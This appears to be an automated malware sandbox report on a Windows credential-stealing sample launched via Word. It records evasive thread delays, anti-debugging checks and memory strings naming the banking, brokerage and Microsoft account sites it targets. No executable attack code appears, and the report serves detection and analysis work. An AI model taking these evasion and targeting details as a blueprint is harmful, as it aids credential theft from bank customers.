Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -594765s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -594656s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -594542s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -594437s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 8_2_028358B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

8_2_028358B4

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599825	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599663	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599538	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599424	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599204	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598981	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598606	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598486	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598368	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598246	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598133	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597905	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597686	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597358	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597139	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597030	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596811	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596702	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596589	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596483	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596226	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596074	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595952	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595733	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595405	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595289	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595061	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594952	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594732	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594608	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594473	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594338	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594225	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594093	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593980	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593862	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593731	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593559	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593444	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593322	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593187	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593058	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592945	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592835	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592666	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592531	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592412	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599890
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599672
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599343
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599228
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599109
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598997
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598875
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598753
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598625
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598516
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598391
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598281
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598171
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598062
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597952
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597843
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597734
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597624
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597514
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597379
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597123
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597015
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596906
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596797
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596687
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596578
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596468
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596358
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596250
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596140
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596031
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595922
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595812
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595703
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595593
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595484
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595374
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595265
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595156
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595042
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594922
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594812
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594703
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594594
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594484
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594372
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599874
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599750
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599640
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599530
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599422
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599312
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599202
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599092
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598957
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598701
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598593
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598484
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598375
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598265
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598156
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598046
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597936
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597828
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597718
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597608
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597500
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597390
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597280
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597172
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597062
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596952
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596843
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596734
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596625
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596515
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596406
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596297
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596187
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596078
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595968
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595858
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595750
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595640
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595531
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595422
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595312
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595202
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595093
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594984
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594873
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594765
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594656
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594542
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594437

Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: brightness.exe, 00000008.00000002.2212129795.000000000080E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2212129795.0000000000839000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: jphwmyiA.pif, 00000010.00000002.3441687082.000000001882F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: jphwmyiA.pif, 0000000C.00000002.3441525726.00000000244F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:vL@$
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Aiymwhpj.PIF, 0000000D.00000002.2327294741.000000000069A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Aiymwhpj.PIF, 00000011.00000002.2402743581.0000000000854000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3435358423.0000000028498000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B720000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: jphwmyiA.pif, 00000014.00000002.3446220044.000000002B77B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Windows\SysWOW64\brightness.exe	API call chain: ExitProcess graph end node	graph_8-25635
Source: C:\Users\Public\Libraries\jphwmyiA.pif	API call chain: ExitProcess graph end node	graph_12-84078
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\jphwmyiA.pif	API call chain: ExitProcess graph end node

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 8_2_0284F024 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

8_2_0284F024

Source: C:\Windows\SysWOW64\brightness.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process queried: DebugPort

Source: C:\Users\Public\Libraries\jphwmyiA.pif

Code function: 12_2_2A1D7A28 LdrInitializeThunk,

12_2_2A1D7A28

Source: C:\Users\Public\Libraries\jphwmyiA.pif

Code function: 12_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

12_2_0040CE09

Source: C:\Users\Public\Libraries\jphwmyiA.pif

12_2_004019F0

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 8_2_02848798 LoadLibraryW,GetProcAddress,FreeLibrary,

8_2_02848798

Source: C:\Users\Public\Libraries\jphwmyiA.pif

Code function: 12_2_0040ADB0 GetProcessHeap,HeapFree,

12_2_0040ADB0

Source: C:\Users\Public\Libraries\jphwmyiA.pif

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_0040CE09
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_0040E61C
